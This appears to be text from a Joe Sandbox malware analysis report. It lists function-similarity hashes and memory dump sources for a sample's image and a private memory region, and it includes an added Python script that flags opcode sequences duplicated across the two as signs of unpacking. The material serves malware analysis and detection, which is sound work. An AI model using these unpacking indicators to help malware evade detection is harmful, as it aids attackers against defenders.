                                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                                    • String ID: ihgf
                                                                                                                                                                                                                                                                    • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                    • Opcode ID: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
                                                                                                                                                                                                                                                                    • Instruction ID: 39294a001ccb7b60b57bd072fead094b817a0247c43ae1e4845dbb8435dacfda
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B81C274A04201AFD714CF28E881A6BB7F2FF99314F15A52DE5858B3A1DB35EC11CB46
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                                                                                    • API String ID: 0-123907689
                                                                                                                                                                                                                                                                    • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                    • Instruction ID: 65632e723c189e4064236202250ffe9fae7105dc8b93c79f62f27da13805b71f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8771D432A083658BD7268E3CC48039EBBE2AFC5714F19892FE49497791D335DC46CB92
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                                                                                    • API String ID: 0-123907689
                                                                                                                                                                                                                                                                    • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                    • Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: w
                                                                                                                                                                                                                                                                    • API String ID: 0-2991200456
                                                                                                                                                                                                                                                                    • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                    • Instruction ID: df1b4b5bbd16396a99fa834d7ad3d71079d0bb8adfbdcfcaeee253d25b5b0675
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 624126BAE116258FD704DFA4CC845ABBB72FB84315B1AC1A8C8847B319D77869078BD0
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: w
                                                                                                                                                                                                                                                                    • API String ID: 0-2991200456
                                                                                                                                                                                                                                                                    • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                    • Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E4119B6E116558FD704DFA4CC855ABBB72FB88315B1AC1A8C8847B319D77868078BD0
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: d8522f48c061d96a90bcbb954765979172c44a155916e8e09891f3aefe40ca7a
                                                                                                                                                                                                                                                                    • Instruction ID: 7df63c40a7204dc4afa58f15cbcbae2765b2c4f4d29a5674b1018b029ffe7601
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8522f48c061d96a90bcbb954765979172c44a155916e8e09891f3aefe40ca7a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4C1F2B16083808BD718DF25C850AAFBBE6EFD2314F14492DE4D68B391DB79C50ACB56
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
                                                                                                                                                                                                                                                                    • Instruction ID: 2e87a28a76dba4f31cae47dba0fb7e22e1a8f98f0dc0d4366023ba0889080103
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35C105716083808BD318DF35C85066BBBE6EBD2314F14893DE4D697392DB39C90ACB56
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: a16964f98263bb64d29cf427ecac629650e46b659aa8a65445bff108377c5da2
                                                                                                                                                                                                                                                                    • Instruction ID: 1d31d0e3cb3652522f7c117d7c65fa6ab86b4b3685883d61f1be044566124514
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a16964f98263bb64d29cf427ecac629650e46b659aa8a65445bff108377c5da2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D614B356083914FD725CF38C85092F7BE1AFA6214F4886BEE8E48B392D775D805DB92
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
                                                                                                                                                                                                                                                                    • Instruction ID: 005a84f34606d807ef7803f473bdaa3d6e6b3e5a6c55ca812da06d8011db77a6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19613839A0C3914FC325CF39C88095B7BE16F96314F4881AEECA54B392D639EC45D796
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: a9beccb418eb2a315fce9c1fee449ff7612de2d6f2e7ef11585c31999dd8e919
                                                                                                                                                                                                                                                                    • Instruction ID: 79698480e789f394c927d8fe7c13ac859d6e499323d4242f8a9ce8e9df0e27f7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9beccb418eb2a315fce9c1fee449ff7612de2d6f2e7ef11585c31999dd8e919
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75516875608301ABD310AF65DC81B2BB7E5EB9A704F16A83EF58197281D7B8DC00DB96
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 896f3fb295f70a3d1d2d868c2c2a0e71ef34daf535ef3f76e5866041dfd6add5
                                                                                                                                                                                                                                                                    • Instruction ID: b7934f5dbae8e7bf1a3736bf650b3951fdbd3a52821caead9a3b3913a6ed58ec
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 896f3fb295f70a3d1d2d868c2c2a0e71ef34daf535ef3f76e5866041dfd6add5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC6178B16003028FE729CF69D891252FBA1FF56300B1996ACC09A8F752E378E5C1CF85
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                                                                                                                                                                                                                                    • Instruction ID: d43369dd8dea3eed20b371991435e06b77f392025ccf259f174b7832396eb45c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F41597AE687144FC328DF68D8C057BB3A2EBD6319F2E853D85D617354DAB04D018249
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
• Opcode ID: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
• Instruction ID: f3345cb18c34d22cea7c76b8972ea9c026089d6dd7aab1ac627898e589a0e88a
• Opcode Fuzzy Hash: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
• Instruction Fuzzy Hash: 0E416676A687148FC328DF64DCC427BB2A2EBDA310F1E952D8AE61B354DB644D018689
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
• Opcode ID: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
• Instruction ID: a4f3071a6e995c0041c68f76b6b5a2f2899fad4f24b3500797d96fc380c5d885
• Opcode Fuzzy Hash: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
• Instruction Fuzzy Hash: 7541D2A05083D18AD7368F3980607FBBBE1EF9325DF1849ADC6C5A7682D7744007C769
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
• Opcode ID: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
• Instruction ID: 6458c2a36ad1cb1d3c56fad7511fb74c051b1bd8ee895f970e959f4703a01e69
• Opcode Fuzzy Hash: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
• Instruction Fuzzy Hash: 404117A02083D18BD7358F3990607B7BFD19FA3219F5948ADC6C597283D7784007C71A
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
• Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
• Instruction ID: 1509d31c443c1ae67e6d3ef752d0b53cabf1848a47a980e19a565ae9d0be59d0
• Opcode Fuzzy Hash: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
• Instruction Fuzzy Hash: 9A51477951C3408BD724CF24D880A6BBBF2EFC6315F18995CF886AB3A5DB309906C746
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
• Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
• Instruction ID: f0dfe561e574c5b04bf144357c30d0d8e3624fae8d6a5d5d31a0a28d0469a5e5
• Opcode Fuzzy Hash: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
• Instruction Fuzzy Hash: A4515A7551C3408FD324CF24D880A6BB7F2EFC6304F14996CF886A7291D7349906CB4A
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
• Opcode ID: afec766a8f46cebfa70309c7c12ba714155290e18f5d997497038f4e7e1a0749
• Instruction ID: d5d5318f892b1b44091b11d2cade97477c72965009e5649f9ce3ceef086fb7a2
• Opcode Fuzzy Hash: afec766a8f46cebfa70309c7c12ba714155290e18f5d997497038f4e7e1a0749
• Instruction Fuzzy Hash: D94126B1A002418BDB25CF39C8A176377E2EFA2308F18456EE592CBBA1E7799445CB10
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
• Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
• Instruction ID: 07081c6e85517efb6beb8e5c0f9faf26f8c54f73b71717f8d55d22052cfc695f
• Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
• Instruction Fuzzy Hash: 214191A050C3D18AD7368B3890607FBBBD0EF9325CF14599DC6D6A7682D7354007CB6A
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
• Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
• Instruction ID: df0643d0793dd6d859baae3aaafaf1000bf3a96435c36713bdd1cf9414b21aca
• Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
• Instruction Fuzzy Hash: BE41B4A021C3D18BD7358B34A0607BBBBD09F93219F54599DC6D6A7283D7394407CB5E
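The entries above come in pairs: the same Opcode ID is reported once from the PE-backed image at 0x400000 and once from the non-PE-backed region at 0x2490000, while the Instruction ID differs between the two copies. That pattern is what an analyst looks for when the report flags unpacking, because it shows the same opcode sequence living both in the mapped image and in a private region. The script below is an added example, not Joe Sandbox code: it parses "Memory Dump Source" blocks in the plain-text form shown on this page and lists the Opcode IDs that occur in both kinds of region. SAMPLE_REPORT is constructed from the entries on this page, trimmed to the fields the grouping needs; the field names and the bullet layout are assumed to match the report text as extracted here.

```python
"""Group Joe Sandbox 'Memory Dump Source' entries by Opcode ID.

Added example; not part of the Joe Sandbox report or its tooling.
SAMPLE_REPORT is constructed from the entries shown on this page.
"""
import re
from collections import defaultdict

SAMPLE_REPORT = """\
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
• Instruction ID: f3345cb18c34d22cea7c76b8972ea9c026089d6dd7aab1ac627898e589a0e88a
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
• Opcode ID: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
• Instruction ID: a4f3071a6e995c0041c68f76b6b5a2f2899fad4f24b3500797d96fc380c5d885
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
• Instruction ID: 6458c2a36ad1cb1d3c56fad7511fb74c051b1bd8ee895f970e959f4703a01e69
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
• Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
• Instruction ID: 1509d31c443c1ae67e6d3ef752d0b53cabf1848a47a980e19a565ae9d0be59d0
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
• Instruction ID: f0dfe561e574c5b04bf144357c30d0d8e3624fae8d6a5d5d31a0a28d0469a5e5
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
• Opcode ID: afec766a8f46cebfa70309c7c12ba714155290e18f5d997497038f4e7e1a0749
• Instruction ID: d5d5318f892b1b44091b11d2cade97477c72965009e5649f9ce3ceef086fb7a2
"""

# Field lines as they appear in the extracted report text (assumed layout).
FIELD_RE = re.compile(r"^•\s*(Source File|Opcode ID|Instruction ID):\s*(.+)$")
SOURCE_RE = re.compile(
    r"^(?P<file>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)$"
)


def parse_entries(text):
    """Return one dict per 'Memory Dump Source' block that carries all three fields."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {}
            entries.append(cur)
            continue
        m = FIELD_RE.match(line) if cur is not None else None
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if key == "Source File":
            s = SOURCE_RE.match(value)
            if not s:
                raise ValueError(f"unrecognised Source File line: {value}")
            cur["file"] = s["file"]
            cur["offset"] = int(s["offset"], 16)
            cur["pe_backed"] = s["pe"] == "true"
        elif key == "Opcode ID":
            cur["opcode_id"] = value
        else:
            cur["instruction_id"] = value
    return [e for e in entries
            if all(k in e for k in ("offset", "opcode_id", "instruction_id"))]


def shared_across_regions(entries):
    """Opcode IDs present both in a PE-backed dump and in a non-PE-backed one.

    A hit means the same opcode sequence exists in the mapped image and in a
    private region: the shape of an unpacked or injected copy of a function.
    """
    groups = defaultdict(list)
    for e in entries:
        groups[e["opcode_id"]].append(e)
    shared = {}
    for oid, hits in groups.items():
        pe = sorted({e["offset"] for e in hits if e["pe_backed"]})
        private = sorted({e["offset"] for e in hits if not e["pe_backed"]})
        if pe and private:
            shared[oid] = {
                "pe_backed": pe,
                "not_pe_backed": private,
                # Distinct Instruction IDs for the same opcode sequence: the
                # copies differ in operands/addresses, not in opcodes.
                "instruction_ids": sorted({e["instruction_id"] for e in hits}),
            }
    return shared


if __name__ == "__main__":
    for oid, info in shared_across_regions(parse_entries(SAMPLE_REPORT)).items():
        print(oid[:16], [hex(o) for o in info["pe_backed"]],
              [hex(o) for o in info["not_pe_backed"]],
              "distinct instruction IDs:", len(info["instruction_ids"]))
```

Run against the full report text rather than the sample, the script gives a quick list of which functions survived from the original image into the private region, which is a useful starting point before opening the .jbxd snapshots in IDA.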
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
Similarity
• Opcode ID: b3442938981b70338c85b6fdcef42b4b1049c4e4fc606aed39a4a87bba456e78
• Instruction ID: 125aea2c9692d0fa95463962f70663838d94599741315adbf2d539f61c023f6a
• Opcode Fuzzy Hash: b3442938981b70338c85b6fdcef42b4b1049c4e4fc606aed39a4a87bba456e78
• Instruction Fuzzy Hash: F0417B79A587144FC264AF68DCC157BB3A1EB96328F2E452DC5E5173A0D7A08C008648
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
Similarity
• Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
• Instruction ID: 0f4440ee56fbb7332076ba964efd05531101175fd03d96dac9314c778f1dce2a
• Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
• Instruction Fuzzy Hash: A2317979A5C7148FC364EFA8E8C057BB3A1EB9B318F2E453D85E50B360D7B08D018649
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Similarity
• Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
• Instruction ID: 78121dedb2d80148adf018004532891c25ca3ce7b5d6c479fa077a4fb261e508
• Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
• Instruction Fuzzy Hash: 5C316879A587188FC328EF54E8C427BB3B0EB8B310F2E952D8AE51B350D7648D01878D
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
Similarity
• Opcode ID: a7540190068c50c970c78dd1fb816c39bd2abd836d4de7d463699aecd841a6eb
• Instruction ID: 4fcb21aed60f81bacbc27a3a9d5ed321bf18520b38f77429489475439136a81d
• Opcode Fuzzy Hash: a7540190068c50c970c78dd1fb816c39bd2abd836d4de7d463699aecd841a6eb
• Instruction Fuzzy Hash: B6419FB26087908BD734CF24C85179FBAF6EBD1214F498E2CD4CAAB345E73589058B97
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
Similarity
• Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
• Instruction ID: a957eb705bbfd764de56ffb9978b5a67515d2f7f68c0f6869acc222245079ba9
• Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
• Instruction Fuzzy Hash: 1C3161A05087D18ADB368F259020BFBBBE0EF9325DF14499DC6D5A7683D7344047CB6A
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
Similarity
• Opcode ID: e0dc337c31b60e59c40b3c4b66153a54b5a75c190226419d79e85c67cff8ed99
• Instruction ID: f2faa9d64caa712646aadb9824d8d9d9194811941a9737ba8201b6991801226f
• Opcode Fuzzy Hash: e0dc337c31b60e59c40b3c4b66153a54b5a75c190226419d79e85c67cff8ed99
• Instruction Fuzzy Hash: AE3139741183C24FD7A64B28C8E0BFBBBD2DF83304F28496ED0CA47692CB254046CB26
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Similarity
• API ID: InitializeThunk
• API String ID: 2994545307-0
• Opcode ID: 888aa382685d0caeac7857589a895e4d05e9bcb5ed8514602e835cd5541883fc
• Instruction ID: d85d8e7ba49753ff7f36d3ed97c285ab1e5e24199585a0ad528ba1d19501f263
